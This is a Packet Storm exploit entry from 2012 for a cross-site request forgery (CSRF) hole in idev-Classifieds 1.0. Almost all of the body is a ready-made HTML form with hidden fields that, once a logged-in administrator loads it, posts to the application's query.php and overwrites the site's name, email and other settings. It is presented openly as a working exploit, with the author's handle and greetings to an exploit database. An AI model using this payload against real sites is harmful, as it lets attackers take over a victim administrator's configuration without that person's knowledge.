idev-Classifieds 1.0 Cross Site Request Forgery

2012-04-05T00:00:00
ID PACKETSTORM:111571
Type packetstorm
Reporter Jonturk75
Modified 2012-04-05T00:00:00

Description

                                        
                                            `# Exploit Title: idev-Classifieds 1.0 CSRF  
# Author: Jonturk75  
# Vendor or Software Link: http://idevspot.com/  
# Category:: webapps  
# Demo : http://idevspot.com/demos/idev-classifieds/admin  
# Greetz: Inj3ct0r Exploit DataBase 1337day.com  
  
  
  
<form action="../library/query.php" method="post" name="form1" id="form1">  
<input name="YOURNAME" class="textarea100" value="yourname" type="hidden">  
<input name="EMAIL" class="textarea100" value="mail@mail.com" type="hidden">  
<input name="SITENAMES" class="textarea100" value="idev-BusinessDirectory" type="hidden">  
<input name="AFFID" class="textarea100" value="" type="hidden">  
<select name="HELPBOX" size="1"><option> Show</option><option selected>Show</option><option>Hide</option></select>  
<input name="Submit" value="Submit" type="submit">  
</form>  
  
  
`